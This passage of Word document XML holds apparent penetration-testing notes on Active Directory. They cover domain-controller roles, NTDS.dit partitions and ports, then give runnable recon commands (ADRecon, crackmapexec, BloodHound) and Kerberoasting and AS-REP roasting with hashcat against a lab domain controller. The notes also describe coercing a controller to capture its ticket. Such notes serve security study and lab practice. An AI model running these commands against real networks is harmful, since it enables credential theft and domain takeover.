        <w:t>Mental model:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DC's local Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> is the "secretary-general" — decides much </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>inside</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the DC, powerless outside; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> is the "president" — power across the domain. But whoever controls </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DC\Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> can set </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> and thus control Domain Admins </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⇒</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DC compromise = domain compromise</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1377F5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Group Policy Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> service applies GPOs; a policy applied while the service runs </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> written to the machine, and disabling the service later does </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> undo an already-applied policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEDBF7C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="6E4A87F1">
          <v:rect id="_x0000_i1199" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD7A47B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>12. AD Internals (NTDS, AD DS, Partitions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDD181" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — the AD database on the DC; delete it and AD is gone. Split into </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB455C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>Schema         - defines the entire AD data structure (forest-wide)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD0D23B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Configuration  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> forest-wide settings (excluding domain data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E0C48" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>&lt;Domain&gt;       - all settings/objects for a domain</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>one partition per domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCA00E5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Inspect with </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADSI Edit</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">; browse objects with </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD Users and Computers</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> pre-DC, local accounts live in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">; post-promotion, domain creds live in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local SAM still exists</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9129C1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD DS services &amp; ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FBC5C7" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>DNS 53           - locating DCs (SRV records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF3604" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>Kerberos 88      - authentication (TGT/TGS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27FF50" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>LDAP 389 / 636   - directory access (LDAPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A5AF5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>Global Catalog 3268 / 3269 - forest-wide search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24003A01" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">SMB 445 / RPC 135 - auth, admin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37BDF967" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="3C4E14E6">
          <v:rect id="_x0000_i1200" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15B15F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>13. AD Recon (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADRecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; friends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714251E4" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADRecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — even a low-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> domain user can pull a full domain picture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C8381" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5DA017" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>#  -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> = -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -ep bypass = -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> Bypass (run unsigned scripts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D35CFD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>.\ADRecon.ps1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>OutputType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> HTML                       # in-domain -&gt; Domain/Groups/Users .html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA30617" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>.\ADRecon.ps1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.5 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>OutputType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> HTML -Credential lab.com\user   # with a cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D7253" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>.\ADRecon.ps1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.5 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>OutputType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ALL  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Credential lab.com\user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287CF6B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complementary recon (over the SOCKS pivot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2CF9B0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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.0/24 -u user -p 'Passw0rd!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73A928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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.5 -u user -p pass --users --groups --pass-pol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2D5AAB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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ldapdomaindump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -u 'lab\user' -p 'Passw0rd!' 172.16.20.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC24C5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bloodhound-python -u user -p 'Passw0rd!' -d lab.com -c all -ns 172.16.20.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B5A73" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># Windows</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.\PowerView.ps1 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> "Domain Admins</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>" ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Find-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LocalAdminAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2969F985" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hunt for:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> Domain Admins, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Kerberoastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> SPNs, AS-REP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>roastable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> users, delegation flags, and where your user is local admin (lateral paths). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>BloodHound's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> shortest-path-to-DA is the fastest planner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61963403" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="1A848835">
          <v:rect id="_x0000_i1201" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5648FB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 xml:space="preserve">14. AD Attacks (Kerberos, Delegation, Lateral Movement, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3AA29F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (crack service-account passwords):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D74A5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GetUserSPNs.py lab.com/user:'Passw0rd!' -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.5 -request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0B157" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -m 13100 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>tgs.hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D01073" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AS-REP roasting</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (pre-auth disabled):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313EE4F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GetNPUsers.py lab.com/ -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>usersfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> users.txt -no-pass -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.20.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA2111" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -m 18200 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>asrep.hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC37740" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delegation abuse (concepts):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C27F48" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unconstrained delegation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> a host that can impersonate any user who authenticates to it — coerce a DC to auth (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>printerbug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PetitPotam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) then capture its TGT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3899CD5D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
